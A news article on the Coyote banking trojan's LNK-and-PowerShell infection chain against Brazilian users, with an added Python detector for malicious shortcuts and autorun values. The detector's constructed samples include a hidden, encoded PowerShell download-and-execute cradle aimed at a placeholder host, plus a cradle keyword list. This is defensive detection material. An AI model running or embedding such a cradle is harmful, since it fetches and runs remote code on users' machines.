Brazilian Windows Users Targeted by Coyote Banking Trojan
A campaign targeting Brazilian Windows users is delivering a banking trojan known as Coyote. The malware is built to steal sensitive financial information, chiefly the credentials used on the banking and cryptocurrency sites it targets, from infected machines.
How the Malware Works
According to Fortinet FortiGuard Labs researcher Cara Lin, once deployed, the Coyote Banking Trojan can perform various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal credentials.
Malware Delivery Mechanism
Over the past month, Fortinet FortiGuard Labs has observed several Windows Shortcut (LNK) files whose embedded PowerShell command lines are responsible for delivering the malware. The shortcut is the lure: when the user opens it, Windows launches PowerShell with the arguments stored inside the shortcut, and that command retrieves the next stage from a remote server.
Infection Chain
The chain as described involves no software vulnerability; it depends on the user opening the shortcut. The LNK file's PowerShell command retrieves the next stage from a remote server, a second PowerShell script then launches a loader, and the loader executes an interim payload.
Base64-Encoding and Exfiltration
Once launched, the interim payload gathers basic system information and the list of antivirus products installed on the host, Base64-encodes that data and exfiltrates it to a remote server. It also runs a series of sandbox and virtual-machine checks so that it can avoid executing under analysis.
Loader and Persistence
The loader relies on Donut, a tool that wraps .NET (MSIL, Microsoft Intermediate Language) payloads in shellcode that decrypts and executes them in memory. The decrypted MSIL payload then establishes persistence by modifying the registry so that the chain is re-launched without any further action from the user.
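The delivery and persistence steps above both come down to a PowerShell command line placed where the user will not see it: in the arguments of a shortcut, or in an autorun registry value written by the MSIL payload. The following Python is an added example, not code from Fortinet or from the original article: it parses the StringData section of a .lnk file as laid out in the MS-SHLLINK specification, decodes any -EncodedCommand argument, flags download-cradle indicators, and applies the same check to a set of registry Run values. The shortcut bytes, the Run values and the stage.example.invalid URL are constructed for the demonstration; the indicator list is a starting heuristic rather than a signature from the campaign, and the CurrentVersion\Run key named in the helper is an assumption about where such persistence typically lives, since the article only says "modifying the registry".

```python
import base64
import re
import struct
from typing import Dict, List, Optional

# MS-SHLLINK: header CLSID and the LinkFlags bits that say which optional
# structures follow the fixed 76-byte ShellLinkHeader.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]  # stored in this order

# Substrings typical of a PowerShell download cradle, matched case-insensitively
# against the shortcut target, its arguments and any decoded -EncodedCommand.
# Heuristic starting list, not indicators taken from the campaign.
INDICATORS = ("powershell", "pwsh", "-enc", "-e ", "-w hidden", "-windowstyle hidden",
              "bypass", "iex", "invoke-expression", "downloadstring",
              "invoke-webrequest", "frombase64string", "http://", "https://")


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Return the StringData fields of a Shell Link. 'arguments' is what Explorer
    hands to the target when the user opens the shortcut."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields: Dict[str, str] = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no NUL
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += width * count
    return fields


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -e/-ec/-enc/-EncodedCommand (Base64 of UTF-16LE)."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_command_line(cmdline: str) -> Dict[str, object]:
    """Score one command line (from a LNK, a Run value or a process log). The
    decoded -enc payload is inspected too, so Base64 does not hide the cradle."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + (decoded or "")).lower()
    hits = [i for i in INDICATORS if i in text]
    return {"decoded_command": decoded, "indicators": hits, "suspicious": bool(hits)}


def assess_lnk(data: bytes) -> Dict[str, object]:
    """Parse a shortcut and score its target path together with its arguments."""
    fields = parse_lnk(data)
    cmdline = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    return {"fields": fields, **assess_command_line(cmdline)}


def scan_run_values(values: Dict[str, str]) -> List[str]:
    """Names of autorun values (assumed exported from a CurrentVersion\\Run key)
    whose command looks like a PowerShell stager."""
    return [n for n, cmd in values.items() if assess_command_line(cmd)["suspicious"]]


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Minimal Unicode .lnk (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS) so
    the parser can be exercised offline. Constructed, not a real capture."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, 0x08 | 0x20 | IS_UNICODE)
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header.ljust(0x4C, b"\x00") + sd(relative_path) + sd(arguments)


# Constructed samples; the URL is hypothetical and nothing here is from the campaign.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/next')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                          f"-w hidden -ep bypass -enc {ENCODED}")
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "-nosession")
RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": f"powershell.exe -w hidden -enc {ENCODED}",
}
```

On a live host, feed assess_lnk the bytes of each .lnk found in the user's download and temp folders, and build the dict for scan_run_values from the Run key's values (for example with PowerShell's Get-ItemProperty); the same assess_command_line heuristic applies to PowerShell command lines taken from process-creation logs.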
Expanding Target List
A notable change in the latest iteration of Coyote is the expansion of its target list, which now covers 1,030 sites and 73 financial agents, including Brazilian cryptocurrency exchanges such as mercadobitcoin.com.br, bitcointrade.com.br and foxbit.com.br.
Complex Infection Process
The Coyote Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets. The infection chain is multi-staged: an LNK file provides initial access, and Fortinet's analysis of that shortcut led to the discovery of the other malicious files in the chain.
Conclusion
The Coyote Banking Trojan is a sophisticated malware that can steal sensitive financial information from users. Its complex infection process and expansion of its target list make it a significant threat to financial cybersecurity.